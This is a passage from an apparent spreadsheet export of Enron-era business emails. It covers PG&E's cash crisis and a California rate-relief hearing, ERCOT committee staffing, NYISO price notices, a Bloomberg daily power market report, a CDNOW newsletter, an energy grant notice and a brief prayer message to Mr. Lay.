1.? PG&amp;E recovered $9.6 billion in its transition cost recovery account _x000D_
during the transition period. _x000D_
2.? PG&amp;E transferred $7.75 billion during the transition period to its _x000D_
parent. _x000D_
3.? PG&amp;E paid dividends of $1,471,000,000 during the transition period. _x000D_
4.? PG&amp;E paid a dividend of $116 million in October when it knew as soon as _x000D_
June that it was amassing a huge underrecovery of its procurement costs._x000D_
_x000D_
5.? For the 4th quarter, PG&amp;E's parent has declared a dividend (a legal _x000D_
obligation of the parent).? PG&amp;E has not determined whether to declare a _x000D_
dividend._x000D_
_x000D_
6.? PG&amp;E's parent has approximately $200 million in cash which it could use _x000D_
to pay its declared dividend. _x000D_
7.? 75% of the parent company's revenues came from PG&amp;E in 2000. _x000D_
8.? PG&amp;E projects a borrowing need of $3.5 billion in the first quarter of _x000D_
2001. _x000D_
9.? PG&amp;E will not have sufficient cash to purchase gas or electricity within _x000D_
3 to 7 weeks. _x000D_
10.? PG&amp;E has not attempted to borrow from its parent and its parent has _x000D_
little or no borrowing power. _x000D_
11.? There is not enough time for its parent to consider selling assets of _x000D_
other subsidiaries. _x000D_
12.? PG&amp;E is fully borrowed under its commercial paper programs and bank _x000D_
lines. _x000D_
13.? PG&amp;E has not considered cutting back executive salaries. _x000D_
14.? Parent company subsidiaries made $10 million on power trading in Western _x000D_
markets. _x000D_
15.? On Tuesday, PG&amp;E will report on its generation revenues.? Mr. Campbell _x000D_
indicated that approximately 40-50% of the undercollections could be netted _x000D_
out by the generation revenues._x000D_
_x000D_
13.? By the end of the year, PG&amp;E estimated that its undercollections will _x000D_
total more than $7 billion. _x000D_
_x000D_
Based on the last several days, I believe that the Commission is very _x000D_
reluctant to declare an end to the rate freeze, particularly if this means _x000D_
that the Commission will lose rate control over the hydro assets.? _x000D_
Alternatively, I believe that President Lynch feels that she has? the _x000D_
necessary statutory authority to order interim emergency rate relief, subject _x000D_
to refund.? In this regard, in the last day of hearings I believe that PG&amp;E _x000D_
met its burden of establishing an emergency condition, which will allow the _x000D_
Commission to act on an emergency basis._x000D_
_x000D_
Several months ago at an industry conference where Commissioner Wood spoke, _x000D_
he indicated that he felt his only responsibility under the law was to _x000D_
consumers.? Thus, I would expect Commissioner Wood to be on the low end on _x000D_
the percentage of rate increase allowed (he does not seem to concerned about _x000D_
the utility entering bankruptcy).? Loretta Lynch takes her cue from Governor _x000D_
Davis and Governor Davis has publicly stated that a 20% rate increase may be _x000D_
reasonable.? Commissioner Neeper's term ends Sunday and he will not vote on _x000D_
the order.? As mentioned above, Commissioners' Duque and Bilas have been _x000D_
noticeably absent from these proceedings.? In any event, given the way _x000D_
President Lynch controls the Commission, you can expect her view to prevail _x000D_
and rate increases to be more in the range of 18-22%._x000D_
_x000D_
I also believe that Commissioner Wood and President Lynch are inclined to _x000D_
find that the utilities' undercollections to date are a risk they assumed _x000D_
under AB1890.? It is possible that the Commission will allow the recovery of _x000D_
past undercollections, but would net out the undercollections with its _x000D_
generation revenues._x000D_
_x000D_
As far as subsequent rate increases on a going forward basis, President Lynch _x000D_
has indicated that she is only willing to consider the issues which must be _x000D_
decided on an emergency basis.? She will likely reject any attempt by the _x000D_
utilities to obtain rate relief on an emergency basis for periods which could _x000D_
be the subject of a full rate hearing._x000D_
_x000D_
Please feel free to contact me at 213-892-4563 or Ed Feo at 213-892-4417 with _x000D_
any questions or requests for documents.? Milbank will plan to cover and _x000D_
issue a report on Tuesday's hearing and the all party meeting and on _x000D_
Wednesday's Commission meeting._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
This e-mail message may contain legally privileged and/or confidential _x000D_
information. If you are not the intended recipient(s), or the employee _x000D_
or agent responsible for delivery of this message to the intended _x000D_
recipient(s), you are hereby notified that any dissemination, _x000D_
distribution or copying of this e-mail message is strictly prohibited. _x000D_
If you have received this message in error, please immediately notify _x000D_
the sender and delete this e-mail message from your computer. _x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Fri, 18 Aug 2000 03:19:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'chris.hilgert@enron.com', 'gerald.nemec@enron.com', 'michael.legler@enron.com', 'dan.bump@enron.com', 'mark.whitt@enron.com'})</t>
  </si>
  <si>
    <t>JM Huber</t>
  </si>
  <si>
    <t>Please see the attached revised drafts.  Please give me a call if you have _x000D_
any questions._x000D_
_x000D_
_x000D_
_x000D_
Debra Perlingiere_x000D_
Enron North America Corp._x000D_
Legal Department_x000D_
1400 Smith Street, EB 3885_x000D_
Houston, Texas 77002_x000D_
dperlin@enron.com_x000D_
Phone 713-853-7658_x000D_
Fax  713-646-3490</t>
  </si>
  <si>
    <t>Fri, 19 Oct 2001 05:04:30 -0700 (PDT)</t>
  </si>
  <si>
    <t>Car Registration</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
Hoon,_x000D_
How can I look for that place on the internet, how is it called?_x000D_
I think there is one on Richmond but I am not sure how to get there..._x000D_
</t>
  </si>
  <si>
    <t>Tue, 4 Jan 2000 10:09:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'sergai.daigre@enron.com'})</t>
  </si>
  <si>
    <t xml:space="preserve">Here is the presentation we need colore copied and bound in a spiral ring 20 _x000D_
times ASAP.  Company # is 413 and Company # is 1231.  My number is 3-7998.  _x000D_
Please give me a call when you are done.  Thanks_x000D_
Ben_x000D_
</t>
  </si>
  <si>
    <t>Wed, 17 Oct 2001 02:00:58 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'2.2839.c0-dxq81_ildmyr.1@cda01.cdnow.com'})</t>
  </si>
  <si>
    <t>New Releases at CDNOW!</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
Dear Paul,_x000D_
_x000D_
A little music and video can go a long way -- and once again we've gone the extra mile to find the best new releases in every style.  Here's what we have this week:_x000D_
_______________________________________________________________________x000D_
 ROCK_x000D_
======================================================================_x000D_
John Mellencamp_x000D_
Cuttin' Heads_x000D_
List Price 18.97_x000D_
CDNOW Price 15.49_x000D_
_x000D_
_x000D_
_x000D_
Go to Cuttin' Heads now:_x000D_
_x000D_
http://cdw01.cdnow.com/Click?q=eb-HlzoQkDGzUEV2PRzeVMKicbp_x000D_
_x000D_
_x000D_
_______________________________________________________________________x000D_
Ozzy Osbourne_x000D_
Down To Earth_x000D_
List Price 18.97_x000D_
CDNOW Price 13.28_x000D_
_x000D_
_x000D_
_x000D_
Go to Down To Earth now:_x000D_
_x000D_
http://cdw01.cdnow.com/Click?q=15-mYn_IGchljxCnMwFkxhgPu5t_x000D_
_x000D_
_x000D_
_______________________________________________________________________x000D_
Lit_x000D_
Atomic (Limited Edition with CD Sampler)_x000D_
List Price 13.97_x000D_
CDNOW Price 12.99_x000D_
_x000D_
_x000D_
_x000D_
Go to Atomic (Limited Edition with CD Sampler) now:_x000D_
_x000D_
http://cdw01.cdnow.com/Click?q=54-l6DvIZKaC2_paAFKsdUt2sU2_x000D_
_x000D_
_x000D_
_______________________________________________________________________x000D_
Grateful Dead_x000D_
The Golden Road (1965 -- 1973)_x000D_
List Price 149.97_x000D_
CDNOW Price 134.97_x000D_
_x000D_
_x000D_
_x000D_
Go to The Golden Road (1965 -- 1973) now:_x000D_
_x000D_
http://cdw01.cdnow.com/Click?q=69-CY7iIoWfSOiwlW4IepHtsArE_x000D_
_x000D_
_x000D_
_______________________________________________________________________x000D_
_x000D_
_x000D_
Get some DEEP savings on our Heavy Hitters page. Every week, we're offering red-hot albums at an unbelievable up to 40% off!  Get in and check out new music from such heavies as J. Lo, Staind, and Diana Krall, plus some of your favorite films on DVD, all for up to 40% off. Check back each week for new picks.  Go to:_x000D_
_x000D_
http://cdw01.cdnow.com/Click?q=93-V4nmQSd7FV2S0NO-AkjG8mro_x000D_
_x000D_
_x000D_
Thanks,_x000D_
_x000D_
Jen McCleaf_x000D_
New Releases Program Manager, CDNOW_x000D_
_x000D_
_x000D_
_x000D_
....................................................._x000D_
The prices of the items featured in this email were accurate at_x000D_
the time the email was sent, but may be subject to change._x000D_
_x000D_
You received this email because you are an account holder at CDNOW._x000D_
If you'd prefer not to receive this weekly New Releases message in_x000D_
the future, go to the link below:_x000D_
http://cdw01.cdnow.com/Click?q=be-B7RxrMp1pPYx-QSbKkysvoHewdRR_x000D_
_x000D_
Or, if you'd like to receive different information from us,_x000D_
you can always update your music preferences by simply going_x000D_
to the MY CDNOW Preferences page at:_x000D_
http://cdw01.cdnow.com/Click?q=fd-BXoMQgOq_rPnyPVw15tCYnC__x000D_
_x000D_
For questions regarding your account, order status or to_x000D_
contact our Customer Service department, please visit our_x000D_
Help Desk._x000D_
http://cdw01.cdnow.com/Click?q=3c-tKlRIcIo_bwZNjviJ6XrrXRk_x000D_
....................................................._x000D_
NR:8854959_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Thu, 15 Nov 2001 08:55:57 -0800 (PST)</t>
  </si>
  <si>
    <t>RE: Thane, open WMS and TAC</t>
  </si>
  <si>
    <t>i agree with your assessment of Forney. I may go for the TAC as Martin needs to focus on the answers not the arguments. I will think about that one._x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Cunningham, Lance  _x000D_
Sent:	Thursday, November 15, 2001 10:39 AM_x000D_
To:	Gilbert-smith, Doug_x000D_
Cc:	Lin, Martin; Shanbhogue, Vasant_x000D_
Subject:	RE: Thane, open WMS and TAC_x000D_
_x000D_
Doug,_x000D_
_x000D_
WMS and TAC both have regularly scheduled meetings one time per month.  As you know, the WMS has a lot of special committees that cover many items and these require additional meetings.  Such as the WMS - TCR group that Martin &amp; I have been attending._x000D_
_x000D_
TAC is the Technical Advisory Committee and I think that Martin would be a great additional to that group.  He has the technical and market background to represent us well there.  _x000D_
_x000D_
WMS, the Wholesale Market Subcommittee, could probably be best represented by one of your staff guys (John Forney).  I know that John trades and it would be a trade-off  for his time but it would integrate the trading side more into the development of the ERCOT market which should be beneficial in the long run. As far as additional WMS working group representation, Martin and I will both support you as you need._x000D_
_x000D_
Lance_x000D_
 -----Original Message----- _x000D_
From: 	Gilbert-smith, Doug  _x000D_
Sent:	Thursday, November 15, 2001 10:03 AM_x000D_
To:	Cunningham, Lance_x000D_
Subject:	RE: Thane, open WMS and TAC_x000D_
_x000D_
how often do these meet and who needs to cover them?_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Cunningham, Lance  _x000D_
Sent:	Tuesday, November 13, 2001 11:14 AM_x000D_
To:	Gilbert-smith, Doug_x000D_
Subject:	Thane, open WMS and TAC_x000D_
_x000D_
Doug,_x000D_
_x000D_
Just trying to keep anything from falling through the cracks._x000D_
_x000D_
Since Thane is leaving Enron, we have our slot open on both WMS and TAC.  Have you thought about filling those positions?_x000D_
_x000D_
Lance</t>
  </si>
  <si>
    <t>Fri, 16 Nov 2001 11:49:12 -0800 (PST)</t>
  </si>
  <si>
    <t>Bullets 11-16-01</t>
  </si>
  <si>
    <t xml:space="preserve">Audrey, here they are...._x000D_
_x000D_
_x000D_
 </t>
  </si>
  <si>
    <t>Wed, 23 May 2001 08:52:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Price Reservations 22 May 2001 Real-Time Market and 23 May 2001_x000D_
 Day-Ahead Market</t>
  </si>
  <si>
    <t>CGoering@nyiso.com writes to the NYISO_TECH_EXCHANGE Discussion List:_x000D_
_x000D_
The NYISO is reserving hours beginning 00:00, 03:00, 04:00, 06:00, 07:00,_x000D_
10:00 - 14:00, and 17:00 - 20:00 in the May 22, 2001 Real-Time Market as_x000D_
well as the following hours per ECA20001006B to verify prices:_x000D_
_x000D_
PJM:  00:00 - 03:00, 05:00, and 06:00_x000D_
OH:   06:00_x000D_
HQ:   03:00, 06:00, and 23:00_x000D_
NE:   06:00, and 23:00_x000D_
_x000D_
Prices in the May 23, 2001 Day-Ahead Market are correct._x000D_
_x000D_
This e-mail information is a copy of the official posting which can be_x000D_
found at the following address on our website:_x000D_
http://mis.nyiso.com/public/htm/OperMessages/CurrentOperMessages.htm#mm</t>
  </si>
  <si>
    <t>Thu, 17 May 2001 08:34:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'messenger@ecm.bloomberg.com'})</t>
  </si>
  <si>
    <t>Bloomberg Power Lines Report</t>
  </si>
  <si>
    <t>Here is today's copy of Bloomberg Power Lines. Adobe Acrobat Reader is_x000D_
required to view the attached pdf file. You can download a free version_x000D_
of Acrobat Reader at_x000D_
   http://www.adobe.com/products/acrobat/readstep.html_x000D_
_x000D_
If you have trouble downloading the attached file it is also located at_x000D_
   http://www.bloomberg.com/energy/daily.pdf_x000D_
_x000D_
Don't forget to check out the Bloomberg PowerMatch West Coast indices, the_x000D_
most accurate indices anywhere. Index values are calculated from actual tra=_x000D_
des_x000D_
and can be audited by all PowerMatch customers._x000D_
_x000D_
Our aim is to bring you the most timely electricity market coverage in the_x000D_
industry and we welcome your feedback on how we can improve the product=20_x000D_
further._x000D_
_x000D_
Bloomberg Energy Department_x000D_
_x000D_
05/17 Bloomberg Daily Power Report_x000D_
_x000D_
Table_x000D_
_x000D_
                      Bloomberg U.S. Regional Electricity Prices_x000D_
      ($/MWh for 25-50 MWh pre-scheduled packages, excluding transmission=_x000D_
=20_x000D_
costs)_x000D_
_x000D_
                            On-Peak_x000D_
West Coast                   Index       Change       Low         High_x000D_
 Mid-Columbia                153.60      +3.60       145.00      160.00_x000D_
 Ca-Or Border                162.60      +22.60      160.00      166.00_x000D_
 NP15                        163.21      +9.79       160.00      165.00_x000D_
 SP15                        128.60      -11.07      120.00      137.00_x000D_
 Ault Colorado               145.00      +20.00      120.00      137.00_x000D_
 Mead                        130.00      -20.00      129.00      131.00_x000D_
 Palo Verde                  141.67      -9.25       135.00      150.00_x000D_
 Four Corners                139.00      -8.50       138.00      140.00_x000D_
_x000D_
Mid-Continent_x000D_
 ECAR                        40.51       -4.93       38.29       43.14_x000D_
  East                       41.00       -3.50       40.00       42.00_x000D_
  AEP                        40.50       -6.50       38.00       42.00_x000D_
  West                       38.67       -5.83       37.00       41.00_x000D_
  Central                    39.96       -6.29       38.00       45.00_x000D_
  Cinergy                    39.96       -6.29       38.00       45.00_x000D_
  South                      41.50       -3.07       36.00       44.00_x000D_
  North                      42.00       -3.00       41.00       43.00_x000D_
 Main                        40.71       -5.50       38.50       43.50_x000D_
  Com-Ed                     37.96       -5.79       36.00       40.00_x000D_
  Lower                      43.46       -5.21       41.00       47.00_x000D_
 MAPP                        45.53       -6.97       43.50       47.00_x000D_
  North                      45.00       -7.00       43.00       46.00_x000D_
  Lower                      46.06       -6.94       44.00       48.00_x000D_
_x000D_
Gulf Coast_x000D_
 SPP                         46.50       -3.63       46.00       48.00_x000D_
  Northern                   47.00       -4.00       46.00       48.50_x000D_
 ERCOT                       52.00       -1.50       48.00       52.00_x000D_
 SERC                        46.55       -1.22       43.68       48.60_x000D_
  Va Power                   39.00       -3.00       38.00       40.00_x000D_
  VACAR                      45.55       -2.78       45.00       48.00_x000D_
  Into TVA                   41.50       -3.07       36.00       44.00_x000D_
  Out of TVA                 45.18       -3.10       39.51       46.21_x000D_
  Entergy                    48.43       -1.30       45.25       52.00_x000D_
  Southern                   43.50       -4.25       42.00       45.00_x000D_
  Fla/Ga Border              62.67       +8.92       60.00       65.00_x000D_
 FRCC                        68.00       +10.50      62.00       74.00_x000D_
_x000D_
East Coast_x000D_
 NEPOOL                      50.20       -0.30       48.25       51.50_x000D_
 New York Zone J             58.13       +2.13       57.50       58.75_x000D_
 New York Zone G             52.50       +3.25       51.75       53.50_x000D_
 New York Zone A             41.50       +4.25       41.25       41.75_x000D_
 PJM                         39.40       +0.60       38.50       40.50_x000D_
  East                       39.40       +0.60       38.50       40.50_x000D_
  West                       39.40       +0.60       38.50       40.50_x000D_
  Seller's Choice            38.90       +0.60       38.00       40.00_x000D_
End Table_x000D_
_x000D_
_x000D_
Northwest Spot Electricity Prices Rise With Reduced Snowmelt_x000D_
_x000D_
     Portland, Oregon, May 17 (Bloomberg Energy) -- Peak spot_x000D_
power prices for Friday-Saturday delivery in the Pacific_x000D_
Northwest increased as less snowmelt and river runoff was_x000D_
available for hydroelectric generation, traders said._x000D_
     A Bloomberg report shows accumulated precipitation in the_x000D_
Western U.S. at 30.33 percent below typical levels and the snow_x000D_
water equivalent for the region at 64.25 percent below average._x000D_
     At the Mid-Columbia trading point in Washington, the_x000D_
Bloomberg index increased $24.82 from yesterday to $153.60 a_x000D_
megawatt hour, with trades executed between $145.00-$160.00._x000D_
     "The rain has stopped in the Northwest, and unlike the_x000D_
snowmelt and the river run-off we had yesterday, it's beginning_x000D_
to slow down,'' said one Northwest trader._x000D_
     At the California Oregon Border, day-ahead peak power gained_x000D_
$22.60 to a Bloomberg index of $162.60, selling in a range of_x000D_
$160.00-$166.00._x000D_
     According to Weather Services Corp. of Lexington,_x000D_
Massachusetts, temperatures in Astoria, Oregon, were expected to_x000D_
reach 57 degrees Fahrenheit today, increasing tomorrow 2 degrees_x000D_
to 59 degrees._x000D_
     "Northwest power prices are also rising with (the) Colstrip_x000D_
unit down,'' said one Northwest marketer._x000D_
     Pennsylvania Power and Light Co.'s 700-megawatt Colstrip-3_x000D_
coal-fired plant located in Colstrip, Montana, shut yesterday for_x000D_
unplanned maintenance and is expected to restart tomorrow._x000D_
      At the NP-15 delivery point, peak power traded at $160.00-_x000D_
$165.00, rising $9.79._x000D_
     Traders said power prices will likely increase over the next_x000D_
few days as snowmelt continues to lessen and higher temperatures_x000D_
are expected._x000D_
     According to Belton, Missouri-based Weather Derivatives_x000D_
Inc., temperatures are expected to average 4.4 degrees Fahrenheit_x000D_
above normal in the Pacific Northwest and 2.7 degrees above_x000D_
normal in the Southwest 6-10 days from now._x000D_
_x000D_
-Robert Scalabrino_x000D_
_x000D_
_x000D_
Most Northeast Spot Power Prices Remain Steady With Low Demand_x000D_
_x000D_
     Philadelphia, May 17 (Bloomberg Energy) -- Values for next-_x000D_
day delivery of peak power remained little changed throughout most_x000D_
of the Northeast U.S. as moderate temperatures continue to curb_x000D_
regional load requirements, traders said._x000D_
     In the Pennsylvania-New Jersey-Maryland Interconnection, peak_x000D_
power scheduled for Friday delivery was assessed at a Bloomberg_x000D_
volume-weighted index of $39.40 per megawatt hour, up only 60_x000D_
cents from yesterday._x000D_
     "This is the annual calm before the storm," said one PJM-_x000D_
based trader. "Prices are right where they should be for this time_x000D_
of year, barring any unforeseen unit outages or sustained heat_x000D_
waves, of course."_x000D_
     Power scheduled for Friday delivery during this week last_x000D_
year was valued at $36.50, representing an 8.2 percent departure_x000D_
from today's comparative index._x000D_
     In the over-the-counter market, expectations for increased_x000D_
supply and scant cooling demand further eroded next-week prices._x000D_
The five-day package was discussed at $38.29-39.25, compared to_x000D_
$42.50-$43 yesterday._x000D_
     According to Weather Derivatives Corp. of Belton, Missouri,_x000D_
temperatures in the Northeast will average 1.1 degree Fahrenheit_x000D_
below normal May 21-May 25._x000D_
     Day-ahead values in the New England Power Pool were also_x000D_
little changed at an index price of $51.50. Traders cited heavy_x000D_
volume in the $51.50-$52.00 range, with an intra-day low and high_x000D_
of $49.75 and $53.00, respectively._x000D_
     Next-week packages remained steady as well, as scheduled line_x000D_
maintenance offset price reactions to the anticipated restart of_x000D_
Entergy Corp.'s Pilgrim 1 nuclear unit._x000D_
     Data from the Independent System Operator of New England_x000D_
shows the Alps-New Scotland transmission line that transmits power_x000D_
to and from New York will be shut May 21-May 24 for breaker_x000D_
repairs._x000D_
     New York was the Northeast's anomaly, with next-day values_x000D_
trading higher across all three zones because of unit outages._x000D_
Zone A jumped $4.25 to an index of $43.00, while Zones G and J_x000D_
posted increases of $3.25 and $2.13, respectively, to $54.00 and_x000D_
$58.13 indices._x000D_
     Niagara Mohawk's 1,148-megawatt Nine Mile Point 2 nuclear_x000D_
unit shut automatically yesterday due to a turbine trip. The_x000D_
company is investigating the cause and hasn't released an expected_x000D_
restart date._x000D_
     Mirant Corp. also lost a unit unexpectedly, its 447-megawatt_x000D_
Tomkins Cove plant, following a boiler explosion. The plant is_x000D_
located 25 miles north of New York City and is fueled by coal,_x000D_
natural gas and oil. Company officials told Bloomberg the unit_x000D_
will remain in shutdown until the cause of the explosion has been_x000D_
determined._x000D_
_x000D_
-Karyn Rispoli_x000D_
_x000D_
_x000D_
ECAR Power Prices Fall as Squeeze Ends; MAIN, MAPP Also Drop_x000D_
_x000D_
     Cincinnati, May 16 (Bloomberg Energy) -- U.S. Mid-Continent_x000D_
next-day power prices declined as traders finished covering short_x000D_
sales in the East Central Area Reliability Council and cooler_x000D_
weather moved into the Midwest, traders said._x000D_
     ECAR traders said prices fell across the region as the_x000D_
Cinergy hub market returned to levels seen before yesterday's_x000D_
"short squeeze," where many market participants had to buy power_x000D_
to fulfill requirements from prior sales._x000D_
     The Bloomberg index price for power delivered Friday into_x000D_
the Cincinnati-based Cinergy Corp. transmission system fell $6.29_x000D_
to $39.96 a megawatt-hour, with trades ranging from $42.00 down_x000D_
to $38.00 after options expiration._x000D_
     "There was still plenty of volume, and plenty of demand from_x000D_
the South," one ECAR trader said. "The drop was just a return to_x000D_
more fundamentally-based prices after yesterday's short squeeze_x000D_
went as far as it could go."_x000D_
     Over-the-counter prices at Cinergy continued to decline_x000D_
after a bearish injection report from the American Gas_x000D_
Association drove natural gas futures prices down further and_x000D_
weather forecasts were revised cooler for next week._x000D_
     Peak Cinergy parcels for delivery from May 21-25 sold at_x000D_
$35.00, down $5.00 from yesterday, while offers fell to $62.00_x000D_
for June power and $95.00 for July-August parcels, the lowest_x000D_
level seen this year._x000D_
     In the Mid-America Interconnected Network, day-ahead power_x000D_
prices dropped as temperatures were expected to do the same, with_x000D_
peak parcels selling $5.79 less on average at $36.00-$40.00 at_x000D_
the Chicago-based Commonwealth Edison hub and $5.21 less on_x000D_
average at $41.00-$47.00 in the lower half of the region._x000D_
     Lexington, Massachusetts-based Weather Services Corp._x000D_
predicted high temperatures in Chicago would fall from 84 degrees_x000D_
Fahrenheit today to 75 degrees tomorrow._x000D_
     Mid-Continent Power Pool next-day electricity prices also_x000D_
fell, as cooler weather reduced demand and lessened transmission_x000D_
constraints, traders said._x000D_
     Peak power sold $7.00 less at $43.00-$46.00 in northern MAPP_x000D_
and $6.94 less at $44.00-$48.00 in the southern half of the_x000D_
region._x000D_
     Weather Services forecast tomorrow's high temperature in the_x000D_
low-to-mid 70s degrees across MAPP, down from temperatures in_x000D_
mid-80s to low-90s degrees earlier this week._x000D_
_x000D_
-Ken Fahnestock_x000D_
_x000D_
_x000D_
Most Southeast Power Prices Drop as Cooler Weather Dominates_x000D_
_x000D_
     Topeka, Kansas, May 17 (Bloomberg Energy) -- U.S._x000D_
Southeast spot electricity prices were mostly lower today as_x000D_
cooler weather was projected to move through the region_x000D_
tomorrow, traders said._x000D_
     The Bloomberg Southeast Electric Reliability Council_x000D_
regional index price fell an average of $2.30 a megawatt-hour,_x000D_
or 4.8 percent from equivalent trades made yesterday for_x000D_
delivery today, to $45.47, amid trades in the $36.00-$65.00_x000D_
range._x000D_
     "We're going to have a 15 degree (Fahrenheit) temperatures_x000D_
change from today to tomorrow if the forecasts are right," said_x000D_
one Southwest Power Pool utility trader. "Because quite a few_x000D_
units are coming back from maintenance, next week's really_x000D_
going to soften up."_x000D_
     Forecasters from Lexington, Massachusetts-based Weather_x000D_
Services Corp. predicted daily high temperatures in the Topeka_x000D_
vicinity would peak tomorrow at 71 degrees Fahrenheit, off from_x000D_
today's projected high of 84 degrees._x000D_
     In the Tennessee Valley, traders said expected high_x000D_
temperatures will decline about 1-3 degrees through tomorrow,_x000D_
cutting residential and commercial power demand for air_x000D_
cooling._x000D_
     On the Tennessee Valley Authority grid, the Bloomberg peak_x000D_
next-day index price slid $3.07 to $41.50 amid trades in the_x000D_
$36.00-$44.00 range. Off-peak energy was discussed at $16-$18,_x000D_
$2 higher on cooler expected overnight weather._x000D_
     Utility traders in the Virginia-Carolinas region said that_x000D_
recent warm weather would continue through tomorrow and the_x000D_
weekend, though temperatures would start out cooler through the_x000D_
first half of next week._x000D_
     The Bloomberg VACAR index fell an average of $2.58 to_x000D_
$45.55 amid trades at $45.00-$48.00._x000D_
     According to Belton, Missouri-based Weather Derivatives_x000D_
Inc., cooling demand across the Southeast was expected to_x000D_
average about a half degree above normal over the next week,_x000D_
though temperatures could average 4.1 degrees below normal over_x000D_
the next 6-10 days._x000D_
_x000D_
-Brian Whary_x000D_
_x000D_
_x000D_
U.K. Power Prices Little Changed in Lackluster Trade_x000D_
_x000D_
     London, May 17 (Bloomberg Energy) -- Power prices in the U.K._x000D_
were little changed today amid lethargic activity, traders said._x000D_
     June traded 10 pence higher at 18.45 pounds a megawatt-hour._x000D_
July traded 10 pence lower at 18.30 pounds a megawatt-hour._x000D_
     Activity was "directionless" today amid little new_x000D_
information to trade on, traders said._x000D_
     Although many power plants have scheduled outages over the_x000D_
coming months for maintenance, one trader said price gains were_x000D_
offset by sufficient supply in the market._x000D_
     Winter 2001 baseload traded 15 pence higher than yesterday_x000D_
following trades at 21.52 pounds a megawatt-hour._x000D_
     Day-ahead baseload started trade at 18.50 pounds a megawatt-_x000D_
hour, 65 pence lower than yesterday._x000D_
     Day-ahead peak traded at 22.00 pounds a megawatt-hour, 40_x000D_
pence lower than yesterday._x000D_
_x000D_
-Amal Halawi_x000D_
_x000D_
_x000D_
Nordic Electricity Prices Close Higher on Elevated Spot Value_x000D_
_x000D_
     Lysaker, Norway, May 16 (Bloomberg Energy) -- Electricity_x000D_
prices on the Nordic Power Exchange in Lysaker, Norway, rose in_x000D_
active afternoon trade after generators set tomorrow's spot price_x000D_
above expectations, traders said._x000D_
Participants rushed to close positions ahead of a Norwegian_x000D_
holiday tomorrow that will keep the market closed. Nordpool is_x000D_
scheduled to re-open on Friday._x000D_
     Winter-2, 2001 jumped 1.75 kroner a megawatt-hour to close at_x000D_
a record high of 218.25 kroner a megawatt-hour with 449.00_x000D_
megawatts exchanged. Winter-1, 2002 gained 2.10 kroner after_x000D_
166.00 megawatts traded between 216.00-218.75 kroner a megawatt-_x000D_
hour._x000D_
     Although industrial end-user demand was anticipated to drop_x000D_
tomorrow as Norway celebrates Constitution Day, Thursday's system_x000D_
area average price was set at 195.41 kroner a megawatt-hour, more_x000D_
than 10 kroner above traders' expectations of 185.00 kroner a_x000D_
megawatt-hour and down 2.97 kroner from today's price._x000D_
     Producers in western Norway retained control over inflowing_x000D_
molten snow, pushing prices higher, an Oslo-based trader said. The_x000D_
minimum hourly spot price in Trondheim, Norway was set at 190.88_x000D_
kroner a megawatt-hour, only 4.53 kroner lower than the system_x000D_
area average price._x000D_
     Nordpool reported an expected 2.5 percent increase in_x000D_
Norwegian reservoirs to 34.7 percent of total capacity at the end_x000D_
of week 19 from the previous week, compared to 49.9 percent of_x000D_
total capacity a year ago. In Sweden, reservoirs were up 7.9_x000D_
percent to 33.2 percent of total capacity, beating expectations of_x000D_
a 5.2 percent gain._x000D_
     Snowmelt in Norway was likely to peak in the next ten days,_x000D_
delaying water tank refilling, while in Sweden it peaked last_x000D_
week, traders said._x000D_
     Limited snow accumulation in the important hydro-producing_x000D_
region of western Norway has also minimized the effect of_x000D_
anticipated supply increases._x000D_
     In the shorter-term, week 21 closed 1.50 kroner higher at_x000D_
195.00 kroner a megawatt-hour after a total 286.00 megawatts_x000D_
traded as low as 190.75 kroner a megawatt-hour. Week 22 jumped_x000D_
5.00 kroner a megawatt-hour to 204.00 kroner a megawatt-hour._x000D_
     Total volumes more-than-quadrupled in afternoon trade to_x000D_
3,717 gigawatt-hours generation compared to this morning's 738_x000D_
gigawatt-hours._x000D_
_x000D_
-Alejandro Barbajosa_x000D_
-0- (BES) May/17/2001 19:21 GMT_x000D_
=0F$_x000D_
_x000D_
_x000D_
 - daily.pdf</t>
  </si>
  <si>
    <t>Mon, 25 Jun 2001 07:20:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>California Energy Commission Grant Program</t>
  </si>
  <si>
    <t>SVMG Energy Committee Members and Liaison Representatives:_x000D_
_x000D_
The CEC recently launched the Innovative Peak Load Reduction_x000D_
Program which provides grants for reducing peak electrical demand._x000D_
Supporting the SVMG Energy Policy,  this program will pay up to $250_x000D_
per kW, and up to 75% of the costs for projects that achieve load_x000D_
reduction between the hours of 2:00PM-6:00PM, June through_x000D_
September.  Attached is a flyer that gives an overview of the_x000D_
program and the scheduled seminars that explain the grant program._x000D_
_x000D_
A seminar is being conducted on Tuesday, June 26, at the San_x000D_
Francisco Airport Holiday Inn to explain the program and the_x000D_
application process.  There is no charge for the seminar and a full_x000D_
complementary breakfast will be provided.  The seminar starts at_x000D_
7:00AM and is about an hour._x000D_
_x000D_
Take advantage of this opportunity to get a state grant to help defer_x000D_
the cost of energy efficiency projects._x000D_
_x000D_
Thank you for your consideration._x000D_
_x000D_
Gary B. Clifford_x000D_
XENERGY_x000D_
_x000D_
(See attached file: Peak Load Program Flyers_fax.pdf)_x000D_
_x000D_
 - Peak Load Program Flyers_fax.pdf</t>
  </si>
  <si>
    <t>Sat, 10 Nov 2001 15:38:03 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'lynda.l.phinney@williams.com'})</t>
  </si>
  <si>
    <t>RE: Precious man of God.</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
Oh Mr. Lay, I am woefully sorry. I know you will be talking to the employees soon and I will be praying for you. _x000D_
I was just praying and asking God what I could say to you. I don't want to be presumptuous. This is the verse that came to mind. Psalm 34:19 "Many are the afflictions of the righteous: but the LORD delivereth him out of them all."  _x000D_
